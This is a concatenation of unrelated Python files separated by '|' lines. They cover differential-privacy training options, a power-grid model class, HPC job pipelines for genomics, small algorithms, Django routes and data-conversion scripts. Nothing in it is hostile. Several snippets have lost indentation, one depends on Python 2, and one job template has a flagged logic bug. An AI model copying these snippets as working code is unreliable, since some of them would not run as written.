    # python fast_torch_dp.py ffnn --dpsgd --batch_size 100000 --dummy_data --epochs 100000
    # Base options (model choice, batch size, epochs, ...) come from
    # utils.get_parser; only the DP-specific knobs are added here.
    parser = utils.get_parser(model_dict.keys())
    parser.add_argument(
        "--sigma",
        type=float,
        default=1.0,
        help="Noise multiplier (default 1.0)",
    )
    parser.add_argument(
        "-c",
        "--max-per-sample-grad_norm",
        type=float,
        default=1.0,
        help="Clip per-sample gradients to this norm (default 1.0)",
    )
    parser.add_argument(
        "--delta",
        type=float,
        default=1e-5,
        help="Target delta (default: 1e-5)",
    )
    args = parser.parse_args()
    main(args)
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.IEC61970.Dynamics.ExcitationSystems.ExcitationSystem import ExcitationSystem
class ExcAC5A(ExcitationSystem):
    """IEEE (1992/2005) AC5A Model The model designated as Type AC5A, is a simplified model for brushless excitation systems. The regulator is supplied from a source, such as a permanent magnet generator, which is not affected by system disturbances. Unlike other ac models, this model uses loaded rather than open circuit exciter saturation data in the same way as it is used for the dc models. Because the model has been widely implemented by the industry, it is sometimes used to represent other types of systems when either detailed data for them are not available or simplified models are required.
    """
    def __init__(self, ka=0.0, e1=0.0, kf=0.0, te=0.0, vrmin=0.0, vrmax=0.0, se2=0.0, tf3=0.0, e2=0.0, ke=0.0, tr=0.0, se1=0.0, tf2=0.0, tf1=0.0, ta=0.0, *args, **kw_args):
        """Initialises a new 'ExcAC5A' instance.
        @param ka: Gain (> 0.)
        @param e1: Field voltage value 1 (> 0.)
        @param kf: Rate feedback gain (>= 0.)
        @param te: Exciter time constant, sec. (> 0.)
        @param vrmin: Minimum controller output (< 0.)
        @param vrmax: Maximum controller output (> 0.)
        @param se2: Saturation factor at e2 (>= 0.)
        @param tf3: Rate feedback lead time constant
        @param e2: Field voltage value 2. (> 0.)
        @param ke: Exciter field resistance line slope
        @param tr: Filter time constant (>= 0.)
        @param se1: Saturation factor at e1 (>= 0.)
        @param tf2: Rate feedback lag time constant (>= 0.)
        @param tf1: Rate feedback lag time constant (> 0.)
        @param ta: Time constant (> 0.)
        """
        #: Gain (> 0.)
        self.ka = ka
        #: Field voltage value 1 (> 0.)
        self.e1 = e1
        #: Rate feedback gain (>= 0.)
        self.kf = kf
        #: Exciter time constant, sec. (> 0.)
        self.te = te
        #: Minimum controller output (< 0.)
        self.vrmin = vrmin
        #: Maximum controller output (> 0.)
        self.vrmax = vrmax
        #: Saturation factor at e2 (>= 0.)
        self.se2 = se2
        #: Rate feedback lead time constant
        self.tf3 = tf3
        #: Field voltage value 2. (> 0.)
        self.e2 = e2
        #: Exciter field resistance line slope
        self.ke = ke
        #: Filter time constant (>= 0.)
        self.tr = tr
        #: Saturation factor at e1 (>= 0.)
        self.se1 = se1
        #: Rate feedback lag time constant (>= 0.)
        self.tf2 = tf2
        #: Rate feedback lag time constant (> 0.)
        self.tf1 = tf1
        #: Time constant (> 0.)
        self.ta = ta
        # Remaining positional/keyword args are forwarded to the base
        # ExcitationSystem initialiser.
        super(ExcAC5A, self).__init__(*args, **kw_args)
    # Class-level metadata consumed by the (code-generated) CIM
    # serialization framework; keep in sync with the attributes above.
    _attrs = ["ka", "e1", "kf", "te", "vrmin", "vrmax", "se2", "tf3", "e2", "ke", "tr", "se1", "tf2", "tf1", "ta"]
    _attr_types = {"ka": float, "e1": float, "kf": float, "te": float, "vrmin": float, "vrmax": float, "se2": float, "tf3": float, "e2": float, "ke": float, "tr": float, "se1": float, "tf2": float, "tf1": float, "ta": float}
    _defaults = {"ka": 0.0, "e1": 0.0, "kf": 0.0, "te": 0.0, "vrmin": 0.0, "vrmax": 0.0, "se2": 0.0, "tf3": 0.0, "e2": 0.0, "ke": 0.0, "tr": 0.0, "se1": 0.0, "tf2": 0.0, "tf1": 0.0, "ta": 0.0}
    _enums = {}
    _refs = []
    _many_refs = []
|
def quicksort(arr):
    """Return a new list with the elements of *arr* sorted ascending.

    Recursive quicksort using the first element as pivot; duplicates of
    the pivot go into the left partition.
    """
    if len(arr) < 2:
        return arr
    pivot, rest = arr[0], arr[1:]
    smaller = [item for item in rest if item <= pivot]
    larger = [item for item in rest if item > pivot]
    return quicksort(smaller) + [pivot] + quicksort(larger)
# Quick smoke test of the sorter.
sample = [12, 2, 4, 6, 3, 18]
print(quicksort(sample))
"""
1. copy dna-CDS to work directory
2. translate dna
3. plot sequence length histogram for dna, untranslated dna, protein
4. run cd-hit on protein
"""
import argparse
import os
import io
import stat
import subprocess
def pipeline():
    """Generate (and optionally qsub) the PBS job scripts for the CRC-mouse
    protein pipeline: copy the source DNA-CDS file, translate DNA to
    protein, then cluster the proteins with CD-HIT.
    """
    args = get_args()
    # qsub options common to every submission
    qsub_params = [
        '-l', 'place=pack:shared',
        '-M', 'jklynch@email.arizona.edu',
        '-m', 'bea',
        '-q', 'standard',
        '-W', 'group_list=bhurwitz'
    ]
    work_scripts_dir = os.path.join(args.work_dir, 'scripts')
    if not os.path.exists(work_scripts_dir):
        os.makedirs(work_scripts_dir)
    _, dna_cds_known_file_name = os.path.split(args.orig_dna_cds_known_path)
    work_dna_cds_known_path = os.path.join(args.work_dir, dna_cds_known_file_name)
    ###########################################################################
    # copy Scott's original data file
    if os.path.exists(work_dna_cds_known_path):
        print('"{}" already exists'.format(work_dna_cds_known_path))
    else:
        copy_script_path = os.path.join(work_scripts_dir, 'copy.sh')
        write_script(script_path=copy_script_path, script_text="""\
#!/bin/bash
pwd
mkdir -p {work_dir}
cp {orig_dna_cds_known_path} {work_dna_cds_known_path}
""".format(**vars(args), work_dna_cds_known_path=work_dna_cds_known_path),
            job_name='crc-mouse-copy',
            select=1,
            ncpus=1,
            mem='6gb',
            pcmem='6gb',
            place='pack:shared',
            walltime='00:10:00',
            cput='00:10:00',
            stderr_fp='crc-mouse-copy.stderr',
            stdout_fp='crc-mouse-copy.stdout',
            qsub_params=qsub_params
        )
        if args.submit:
            qsub_script(script_path=copy_script_path)
        else:
            print('"{}" will not be submitted'.format(copy_script_path))
    ###########################################################################
    ###########################################################################
    # translate dna to protein
    # this job ran in 00:42:31 on ocelote
    translate_script_path = os.path.join(work_scripts_dir, 'translate.sh')
    write_script(script_path=translate_script_path, script_text="""\
#!/bin/bash
source activate mouse
python {scripts_dir}/translate-microbial-dna-CDS.py \\
-i {work_dna_cds_known_path} \\
-o {work_dir}/crc-mouse-protein-from-known-only.fa \\
-u {work_dir}/crc-mouse-untranslated-microbial-dna-CDS-known.fa \\
-l {translation_limit}
""".format(**vars(args), work_dna_cds_known_path=work_dna_cds_known_path),
        job_name='crc-mouse-translate',
        select=1,
        ncpus=1,
        mem='6gb',
        pcmem='6gb',
        place='pack:shared',
        walltime='01:00:00',
        cput='01:00:00',
        stderr_fp='mouse_translate.stderr',
        stdout_fp='mouse_translate.stdout',
        qsub_params=qsub_params
    )
    if args.submit:
        qsub_stdout, _ = qsub_script(script_path=translate_script_path)
        translate_job_id = qsub_stdout.strip()
    else:
        print('"{}" will not be submitted'.format(translate_script_path))
        translate_job_id = None
    ###########################################################################
    ###########################################################################
    # cluster proteins with CD-HIT
    # had to build cd-hit on ocelote
    # $ git clone https://github.com/weizhongli/cdhit.git
    # $ cd cdhit
    # $ make
    # this job ran in 00:19:50 (06:46:32 cput) on one node of ocelote (28 cores)
    # cput does not match up with walltime
    cluster_script_path = os.path.join(work_scripts_dir, 'cluster_proteins.sh')
    write_script(script_path=cluster_script_path, script_text="""\
#!/bin/bash
{cd_hit_bin} \\
-i {work_dir}/crc-mouse-protein-from-known-only.fa \\
-o {work_dir}/crc-mouse-cd-hit-c90-n5-protein-known.db \\
-c 0.9 -n 5 -M 168000000 -d 0 -T 28
""".format(**vars(args)),
        # BUG FIX: without --submit translate_job_id is None and the former
        # unconditional 'afterok:' + translate_job_id raised TypeError; only
        # declare the dependency when a job id actually exists.
        depend='afterok:' + translate_job_id if translate_job_id else None,
        job_name='crc-mouse-cdhit',
        select=1,
        ncpus=28,
        mem='168gb',
        pcmem='6gb',
        place='pack:shared',
        walltime='00:30:00',
        cput='14:00:00',
        stderr_fp='mouse_cluster.stderr',
        stdout_fp='mouse_cluster.stdout',
        qsub_params=qsub_params
    )
    if args.submit:
        cluster_job_id, _ = qsub_script(script_path=cluster_script_path)
    else:
        print('"{}" will not be submitted'.format(cluster_script_path))
        cluster_job_id = None
    ###########################################################################
def get_args():
    """Parse, echo, and return the pipeline's command-line arguments."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-w', '--work-dir', default=os.path.join(os.getcwd(), 'work'))
    parser.add_argument('-s', '--scripts-dir', default=os.path.join(os.getcwd(), 'scripts'))
    parser.add_argument(
        '-i', '--orig-dna-cds-known-path',
        default='/rsgrps/bhurwitz/scottdaniel/extract-fasta/data/dna-of-CDS-from-known-only.fa')
    parser.add_argument('-l', '--translation-limit', type=int, default=-1)
    parser.add_argument('--cd-hit-bin', default='~/local/cdhit/cd-hit')
    parser.add_argument('--submit', action='store_true', default=False)
    parsed = parser.parse_args()
    print(parsed)
    return parsed
def write_script(script_path, script_text, **kwargs):
    """Write a PBS job script to *script_path* and make it user-executable.

    The first line of *script_text* (the shebang) is written first, then
    the #PBS directive block built from **kwargs, then the remaining
    (left-stripped) body lines.  Returns *script_path*.
    """
    print(kwargs)
    with open(script_path, 'wt') as script_file:
        script_text_buffer = io.StringIO(script_text)
        # Shebang must precede the #PBS directives.
        script_file.write(script_text_buffer.readline().lstrip())
        script_file.write("""\
#PBS -N {job_name}
#PBS -q standard
#PBS -W group_list=bhurwitz
#PBS -l select={select}:ncpus={ncpus}:mem={mem}:pcmem={pcmem}
#PBS -l place={place}
#PBS -l cput={cput}
#PBS -l walltime={walltime}
#PBS -m bea
#PBS -M jklynch@email.arizona.edu
#PBS -e {stderr_fp}
#PBS -o {stdout_fp}
""".format(**kwargs))
        if 'depend' in kwargs and kwargs['depend'] is not None:
            script_file.write("""\
#PBS -W depend={depend}
""".format(**kwargs))
        # BUG FIX: 'place' was previously written a second time here even
        # though the directive block above always includes it, so every
        # generated script contained a duplicate '#PBS -l place' line.
        for line in script_text_buffer:
            script_file.write(line.lstrip())
    os.chmod(script_path, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR)
    return script_path
def run_script(script_path):
    """Execute *script_path* locally, echoing its captured stderr/stdout.

    NOTE(review): shell=True combined with a list only hands the first
    element to the shell on POSIX -- it works here because just the path is
    passed; confirm before ever adding arguments.
    """
    print('running "{}"'.format(script_path))
    completed = subprocess.run(
        [script_path],
        shell=True,
        stderr=subprocess.PIPE,
        stdout=subprocess.PIPE)
    print('stderr:\n{}'.format(completed.stderr.decode('utf-8')))
    print('stdout:\n{}'.format(completed.stdout.decode('utf-8')))
def qsub_script(script_path):
    """Submit *script_path* with qsub and return (stdout, stderr).

    When qsub is not installed (e.g. on a development laptop) the script
    is run locally instead and (None, None) is returned.
    """
    print('qsub "{}"'.format(script_path))
    subprocess_cmd_list = ['qsub', script_path]
    print(subprocess_cmd_list)
    try:
        completed = subprocess.run(
            subprocess_cmd_list,
            shell=False,
            stderr=subprocess.PIPE,
            stdout=subprocess.PIPE)
    except FileNotFoundError as e:
        # this usually means I am testing on my laptop
        print('no qsub executable')
        run_script(script_path=script_path)
        return None, None
    stdout = completed.stdout.decode('utf-8')
    stderr = completed.stderr.decode('utf-8')
    print('stderr:\n{}'.format(stderr))
    print('stdout:\n{}'.format(stdout))
    return stdout, stderr
if __name__ == '__main__':
pipeline()
|
"""
[ref.href] leetcode.com/problems/contains-duplicate-ii
"
Given an array of integers and an integer k, find out whether
there are two distinct indices i and j in the array such that
nums[i] = nums[j] and the difference between i and j is at most k.
"
"""
class Solution(object):
    def containsNearbyDuplicate(self, nums, k):
        """
        :type nums: List[int]
        :type k: int
        :rtype: bool

        Track the most recent index of each value; finding the same value
        again within distance k answers True immediately.
        """
        last_seen = {}
        for index, value in enumerate(nums):
            previous = last_seen.get(value)
            if previous is not None and index - previous <= k:
                return True
            last_seen[value] = index
        return False
|
import os
import numpy as np
import pandas as pd
# Merge the 2011-2014 San Francisco salary CSVs into one table with a
# uniform column set and a sequential Id column.
col_names = ["EmployeeName",
             "JobTitle",
             "BasePay",
             "OvertimePay",
             "OtherPay",
             "Benefits",
             "TotalPay",
             "TotalPayBenefits",
             "Year",
             "Notes",
             "Agency"]
frames = []
for year in range(2011, 2015):
    if year == 2014:
        # The 2014 export gained a trailing "Status" column.
        col_names = col_names + ["Status"]
    year_data = pd.read_csv("input/san-francisco-%d.csv" % year,
                            header=None,
                            skiprows=1,
                            names=col_names)
    if year == 2011:
        year_data["Benefits"] = np.nan  # originally "Not Provided"
    if year < 2014:
        # Pad the earlier years so every frame has a Status column.
        year_data.insert(year_data.shape[1], "Status", np.nan)
    frames.append(year_data)
# PERF FIX: concatenate once after the loop instead of re-concatenating the
# growing frame on every iteration (quadratic copying).
data = pd.concat(frames)
data.insert(0, "Id", list(range(1, len(data) + 1)))
data.to_csv("output/Salaries.csv", index=False)
|
'''
Models
------
This is currently required for:
$> python manage.py test rpc4django
to run.
see: http://code.djangoproject.com/ticket/7198
''' |
import os
import textwrap
import config
class DoNotUseThisSetting():
    """Sentinel placeholder: any attempt to repr/str/format it raises.

    Bound by inject() to settings that must not appear in a template under
    the current qtl_mode, so accidental use fails loudly.
    """

    def __repr__(self):
        raise Exception('DoNotUseThisSetting')
def inject(region, paths, fmt):
    """Fill the job-script template *fmt* for *region*.

    Dedents the template, substitutes all config-derived settings, and
    records every output path it mentions into *paths* (so the caller can
    create directories first).  Settings forbidden under the current
    qtl_mode are bound to DoNotUseThisSetting, whose repr raises if the
    template actually references them.
    """
    assert config.qtl_mode in ['nominal', 'permutation']
    chrom = region.split(':')[0]
    def register_path(fmt):
        # Resolve a path template against job_directory/region and
        # remember it for later directory creation.
        path = fmt.format(config.job_directory, region)
        if path not in paths:
            paths.append(path)
        return path
    def intge(var, n):
        # Validate that an integer-valued config setting is >= n.
        assert int(var) >= n
        return int(var)
    fmt = textwrap.dedent(fmt).lstrip('\n')
    return fmt.format(
        exposure_bed = config.exposure_bed.format(chr=chrom),
        outcome_bed = config.outcome_bed.format(chr=chrom),
        exposure_qtl = register_path('{0}/{1}/exposure/exposure.nom.txt'),
        outcome_qtl = register_path('{0}/{1}/outcome/outcome.nom.txt'),
        exposure_cojo_dir = register_path('{0}/{1}/exposure/exposure.cojo/'),
        outcome_cojo_dir = register_path('{0}/{1}/outcome/outcome.cojo/'),
        gsmr_combinations = register_path('{0}/{1}/gsmr/gsmr_combinations.txt'),
        gsmr_exposure = register_path('{0}/{1}/gsmr/gsmr_exposure.txt'),
        gsmr_outcome = register_path('{0}/{1}/gsmr/gsmr_outcome.txt'),
        gsmr_out_dir = register_path('{0}/{1}/gsmr/combinations/'),
        gsmr_out_filtered = register_path('{0}/{1}.gsmr'),
        gsmr_out=DoNotUseThisSetting(),
        gsmr_plot_dir = register_path('{0}/{1}/plot/'),
        gen_bed = register_path('{0}/{1}/gsmr/bed'),
        qtl_extra_opts = config.qtl_extra_opts,
        covariance_exposure = getattr(config, 'covariance_exposure', False) or config.covariance,
        covariance_outcome = getattr(config, 'covariance_outcome', False) or config.covariance,
        vcf = config.vcf_per_chr.format(chr=chrom),
        sumstats = config.sumstats_per_chr.format(chr=chrom),
        job_directory = config.job_directory,
        qtl_nom_pvalue = config.qtl_nom_pvalue if config.qtl_mode == 'nominal' else DoNotUseThisSetting(),
        qtl_permutations = config.qtl_permutations if config.qtl_mode == 'permutation' else DoNotUseThisSetting(),
        qtl_mode = config.qtl_mode,
        qtl_window = config.qtl_window,
        qtl_seed = config.qtl_seed,
        #region = region if ':' in region else '{0:02d}'.format(int(chrom)), # hacky
        software_rscript = config.software_rscript,
        MAF_threshold_exposure = float(config.maf_threshold_exposure),
        MAF_threshold_outcome = float(config.maf_threshold_outcome),
        excl_cov_exposure_file = config.excl_cov_exposure_file,
        excl_cov_outcome_file = config.excl_cov_outcome_file,
        gsmr_r2 = config.gsmr_r2,
        gsmr_p = config.gsmr_p,
        arg_qtltools_mode = "--nominal " + str(config.qtl_nom_pvalue)
        if config.qtl_mode == 'nominal' else "--permute " + str(config.qtl_permutations),
        qtl_jobs=intge(config.qtl_jobs, 1),
        gsmr_max_job_idx=intge(config.gsmr_jobs, 1)-1,
    )
def jobs_for_region(region):
    """Build the ordered SLURM job specs for one genomic *region*.

    Returns a list of dicts {jobname, job, depends} covering: directory
    creation, exposure/outcome QTL scans (QTLtools), COJO conversion,
    PLINK bed creation, GSMR pairing/running/summarising and plotting.
    inject() records every output path into *paths* so create_dirs can
    make the directories first.
    """
    paths = []
    qtltools_exposure = inject(region, paths, r'''
    #!/usr/bin/env bash
    #SBATCH --time 35:00:00
    #SBATCH --mem 5G
    #SBATCH --array=1-{qtl_jobs}
    if [ ! -f "{exposure_qtl}.${{SLURM_ARRAY_TASK_ID}}" ]; then
        vendor/qtltools_v1.2-stderr cis \
            {arg_qtltools_mode} \
            --vcf "{vcf}" \
            --bed "{exposure_bed}" \
            --cov "{covariance_exposure}" \
            --out "{exposure_qtl}".${{SLURM_ARRAY_TASK_ID}} \
            --window "{qtl_window}" \
            --exclude-covariates "{excl_cov_outcome_file}" \
            --seed "{qtl_seed}" \
            "{qtl_extra_opts}" \
            --std-err \
            --chunk ${{SLURM_ARRAY_TASK_ID}} ${{SLURM_ARRAY_TASK_COUNT}}
    fi
    ''')
    qtltools_exposure_collect = inject(region, paths, r'''
    #!/usr/bin/env bash
    #SBATCH --time 4:00:00
    #SBATCH --mem 20G
    if [ -z "$(ls -A {exposure_cojo_dir} | head -n 1)" ]; then
        python3 _scripts/split_qtl_to_cojo.py \
            "{exposure_qtl}".'*' \
            "{sumstats}" \
            "{exposure_cojo_dir}" \
            "{MAF_threshold_exposure}"
    fi
    find "{exposure_cojo_dir}" -type f \
        | awk -F / '{{print $NF " " $0}}' \
        > "{gsmr_exposure}"
    ''')
    qtltools_outcome = inject(region, paths, r'''
    #!/usr/bin/env bash
    #SBATCH --time 35:00:00
    #SBATCH --mem 5G
    #SBATCH --array=1-{qtl_jobs}
    if [ ! -f "{outcome_qtl}.${{SLURM_ARRAY_TASK_ID}}" ]; then
        vendor/qtltools_v1.2-stderr cis \
            {arg_qtltools_mode} \
            --vcf "{vcf}" \
            --bed "{outcome_bed}" \
            --cov "{covariance_outcome}" \
            --out "{outcome_qtl}".${{SLURM_ARRAY_TASK_ID}} \
            --window "{qtl_window}" \
            --exclude-covariates "{excl_cov_exposure_file}" \
            --seed "{qtl_seed}" \
            "{qtl_extra_opts}" \
            --std-err \
            --chunk ${{SLURM_ARRAY_TASK_ID}} ${{SLURM_ARRAY_TASK_COUNT}}
    fi
    ''')
    qtltools_outcome_collect = inject(region, paths, r'''
    #!/usr/bin/env bash
    #SBATCH --time 2:00:00
    #SBATCH --mem 20G
    if [ -z "$(ls -A {outcome_cojo_dir} | head -n 1)" ]; then
        python3 _scripts/split_qtl_to_cojo.py \
            "{outcome_qtl}".'*' \
            "{sumstats}" \
            "{outcome_cojo_dir}" \
            "{MAF_threshold_outcome}"
    fi
    find "{outcome_cojo_dir}" -type f \
        | awk -F / '{{print $NF " " $0}}' \
        > "{gsmr_outcome}"
    ''')
    # NOTE(review): the template below contains a second, redundant shebang
    # line after the SBATCH headers (harmless to bash, but confusing).
    create_bed = inject(region, paths, r'''
    #!/usr/bin/env bash
    #SBATCH --time 1:00:00
    #SBATCH --mem 40G
    #!/usr/bin/env bash
    if [ ! -f "{gen_bed}.bed" ]; then
        plink2 --make-bed \
            --vcf "{vcf}" \
            --out "{gen_bed}"
    fi
    ''')
    gsmr_pairs = inject(region, paths, r'''
    #!/usr/bin/env bash
    #SBATCH --time 15:00:00
    #SBATCH --mem 60G
    if [ ! -f "{gsmr_combinations}" ]; then
        python3 _scripts/gsmr_pairs.py \
            "{gsmr_exposure}" \
            "{gsmr_outcome}" \
            > "{gsmr_combinations}"
    fi
    ''')
    # NOTE(review): in the template below, ${combination} is tested in the
    # 'if [ ! -f ... ]' guard BEFORE being assigned on the following line,
    # so the guard sees the previous iteration's value (empty on the first
    # pass) -- confirm whether the skip-if-done check ever worked.
    run_gsmr = inject(region, paths, r'''
    #!/usr/bin/env bash
    #SBATCH --time 2:00:00
    #SBATCH --mem 40G
    #SBATCH --array 0-{gsmr_max_job_idx}
    cat "{gsmr_combinations}" \
        | awk "(NR-1)%${{SLURM_ARRAY_TASK_COUNT}} == ${{SLURM_ARRAY_TASK_ID}}" \
        | while read line; do
        if [ ! -f "{gsmr_out_dir}"/"${{combination}}.log" ]; then
            combination=$(echo "$line" | awk '{{print $1 "-" $2}}')
            exposure=$(echo "$line" | awk '{{print $1}}')
            outcome=$(echo "$line" | awk '{{print $2}}')
            exposure_file=$(echo "$line" | awk '{{print $3}}')
            outcome_file=$(echo "$line" | awk '{{print $4}}')
            echo "${{exposure}}" "${{exposure_file}}" > "{gsmr_out_dir}/${{combination}}.gsmr_exposure.txt"
            echo "${{outcome}}" "${{outcome_file}}" > "{gsmr_out_dir}/${{combination}}.gsmr_outcome.txt"
            gcta_1.92.1b6 \
                --bfile "{gen_bed}" \
                --gsmr-file \
                    "{gsmr_out_dir}/${{combination}}.gsmr_exposure.txt" \
                    "{gsmr_out_dir}/${{combination}}.gsmr_outcome.txt" \
                --gsmr-direction 2 \
                --out "{gsmr_out_dir}"/"${{combination}}" \
                --gwas-thresh {gsmr_p} \
                --effect-plot \
                --clump-r2 {gsmr_r2} || true
        fi
    done
    ''')
    gsmr_summarize = inject(region, paths, r'''
    #!/usr/bin/env bash
    #SBATCH --time 8:00:00
    #SBATCH --mem 40G
    (
        cat "{gsmr_out_dir}"/*.gsmr | head -n 1
        cat "{gsmr_out_dir}"/*.gsmr | grep -vE 'Exposure|nan'
    ) | column -t > "{gsmr_out_filtered}"
    python3 _scripts/summarize_gsmr.py \
        "{gsmr_out_filtered}" \
        "{exposure_qtl}.*" \
        "{outcome_qtl}.*"\
        > "{gsmr_out_filtered}.summary"
    ''')
    # NOTE(review): the quoted "{gsmr_out_dir}*.eff_plot.gz" glob below does
    # not expand under bash quoting -- the for-loop runs exactly once with
    # the literal pattern as $file; confirm intended behaviour.
    plot_gsmr = inject(region, paths, r'''
    #!/usr/bin/env bash
    #SBATCH --time 8:00:00
    #SBATCH --mem 40G
    for file in "{gsmr_out_dir}*.eff_plot.gz"
    do
        base={gsmr_out_dir}$(basename $file .eff_plot.gz)
        echo $base
        "/hpc/local/CentOS7/dhl_ec/software/R-3.4.0/bin/Rscript" _scripts/run_gsmr_plot.r \
            "$file" \
            "$base.gsmr" \
            "{gsmr_plot_dir}"
    done
    ''')
    # Every registered output path implies a directory to create up front.
    basedirs = sorted(list(set(map(os.path.dirname, paths))))
    create_dirs = '\n'.join('mkdir -p {0}'.format(basedir) for basedir in basedirs) + '\n'
    create_dirs = textwrap.dedent(r'''
    #!/usr/bin/env bash
    {0}
    '''.lstrip('\n')).format(create_dirs)
    # Jobs in dependency order; 'depends' names earlier jobnames.
    return [
        dict(jobname='create_dirs', job=create_dirs, depends=[]),
        dict(jobname='exp', job=qtltools_exposure, depends=['create_dirs']),
        dict(jobname='expc', job=qtltools_exposure_collect, depends=['exp']),
        dict(jobname='out', job=qtltools_outcome, depends=['create_dirs']),
        dict(jobname='outc', job=qtltools_outcome_collect, depends=['out']),
        dict(jobname='bed', job=create_bed, depends=['create_dirs']),
        dict(jobname='pairs', job=gsmr_pairs, depends=['expc', 'outc', 'bed']),
        dict(jobname='gsmr', job=run_gsmr, depends=['pairs']),
        dict(jobname='summary', job=gsmr_summarize, depends=['gsmr']),
        dict(jobname='plot', job=plot_gsmr, depends=['summary']),
    ]
|
import numpy as np
from tests.extras import canosa_values
from diagnostics.z_function import get_roots_to_electrostatic_dispersion
def test_z_solver():
    """Dispersion roots must match the Canosa reference values to 4 dp."""
    reference = zip(canosa_values.k0, canosa_values.w_real, canosa_values.w_imag)
    for wavenumber, real_part, imag_part in reference:
        root = get_roots_to_electrostatic_dispersion(wp_e=1.0, vth_e=1.0, k0=wavenumber)
        np.testing.assert_almost_equal(real_part + 1j * imag_part, root, decimal=4)
|
import socket
import base64
from uuid import uuid4
import cv2
import numpy as np
# pylint: disable=no-member, unused-variable
def encodeImg(img):
    """Encode an image array as PNG bytes and return them base64-encoded."""
    png_buffer = cv2.imencode(".png", img)[1]
    return base64.b64encode(png_buffer)
def decodeImg(img):
    """Decode a base64-encoded PNG back into an image array."""
    raw_bytes = base64.b64decode(img)
    pixel_buffer = np.frombuffer(raw_bytes, dtype=np.uint8)
    return cv2.imdecode(pixel_buffer, cv2.IMREAD_ANYCOLOR,)
def generateSocket(timeout):
    """Create a TCP socket with *timeout* and SO_REUSEADDR enabled."""
    tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp_socket.settimeout(timeout)
    tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    return tcp_socket
def getUUID():
    """Return a fresh random UUID4 as its canonical string form."""
    return "{}".format(uuid4())
# pylint: disable=fixme
# TODO: Make this less fragile? Use socket.bind_to_random_port with zmq?
def getOpenPort():
    """Ask the OS for a currently-free TCP port number and return it.

    The probe socket is closed before returning, so another process could
    race us to the port.
    """
    probe = socket.socket()
    probe.bind(('', 0))
    _, port = probe.getsockname()
    probe.close()
    return port
def baseToPubSubPort(base):
    """Return the pub/sub port paired with *base* (always base + 1)."""
    pubsub_offset = 1
    return base + pubsub_offset
|
import unittest
import finance
class TestFinanceFunctions(unittest.TestCase):
    """Smoke tests for the finance helper module."""

    def test_symbols(self):
        """The DAX symbol list is exposed as a tuple."""
        # IDIOM FIX: assertIsInstance replaces the comparison of type
        # objects (assertEqual(type(x), type(()))) and yields a clearer
        # failure message.
        self.assertIsInstance(finance.symbols.dax, tuple)


if __name__ == '__main__':
    unittest.main()
|
from django.urls import re_path
from django.views.decorators.csrf import csrf_exempt
from .views import ToDo, Bucket
# URL routes for the ToDo/Bucket API, with CSRF disabled per view.
# BUG FIX: patterns are now anchored with '^'.  Django's RegexPattern
# matches with re.search, so an unanchored r'todos$' also matched paths
# like 'mytodos'.
urlpatterns = [
    # Collection endpoint: list/create todos.
    re_path(r'^todos$',
            csrf_exempt(ToDo.as_view()),
            name="Todos"),
    # Detail endpoint: a single todo addressed by numeric id.
    re_path(r'^todos/(?P<id>\d+)$',
            csrf_exempt(ToDo.as_view()),
            name="Todo"),
    # Collection endpoint: list/create buckets.
    re_path(r'^buckets$',
            csrf_exempt(Bucket.as_view()),
            name="Buckets"),
]
|
__version__ = '3.0.0'
def get_version():
return __version__
|
# Telegram Bot
token = 'XXX'  # bot API token -- placeholder, fill in before use
# Telegram Chat Owner
api_id = 123  # Telegram application api_id -- placeholder
api_hash = 'YYY'  # Telegram application api_hash -- placeholder
|
from ncvoter.settings import * # noqa: F403
# Local development overrides.  DATABASES comes from the base
# ncvoter.settings module via the star import above; point it at the
# Postgres instance on port 5455 with trust auth (no user/password).
DATABASES['default'].update({  # noqa: F405
    'PORT': 5455,
    'NAME': 'ncvoter',
    'USER': '',
    'PASSWORD': '',
})
# Destination directories for the voter/vote-history bulk downloads
# (external drive paths; macOS-style mount point).
NCVOTER_DOWNLOAD_PATH = "/Volumes/Untitled/downloads/ncvoter"
NCVHIS_DOWNLOAD_PATH = "/Volumes/Untitled/downloads/ncvhis"
|
#!/usr/bin/env python
# coding=utf-8
import json
import xlwt
import sys
testfile = 'student.json'  # input JSON with student records
savename = '../cache/student.xls'  # output spreadsheet path
sheetname = 'student'  # worksheet name inside the workbook
def json_to_excel():
    """Convert the student JSON records into an .xls spreadsheet.

    Writes one row per student: number, name, then the Chinese, math and
    English scores, all as strings.
    """
    students = get_json(testfile)
    # NOTE (from original author): tried with and without encoding='utf-8';
    # the generated file's md5 was identical either way.
    workbook = xlwt.Workbook(encoding='utf-8')
    workbook.set_owner('KaiFromPython')
    sheet = workbook.add_sheet(sheetname)
    for row, student in enumerate(students):
        sheet.write(row, 0, str(student['stu_no']))
        sheet.write(row, 1, str(student['stu_name']))
        sheet.write(row, 2, str(student['chinese']))
        sheet.write(row, 3, str(student['math']))
        sheet.write(row, 4, str(student['english']))
    workbook.save(savename)
# Convert json format file to python object
def get_json(testfile):
    """Read *testfile* and return its deserialized JSON content."""
    # The codec should be the same as the file encoding.
    with open(testfile, 'r') as handle:
        return json.load(handle)
if __name__ == '__main__':
    # Python 2 only: reload(sys)/setdefaultencoding do not exist in
    # Python 3 -- this entry point cannot run under py3 as written.
    reload(sys)
    sys.setdefaultencoding('utf-8')
    json_to_excel()
|
import os
import shutil
class NotADirectoryError(Exception):
    """Indicates a file was found when a directory was expected."""
    def __init__(self, directory, message=None):
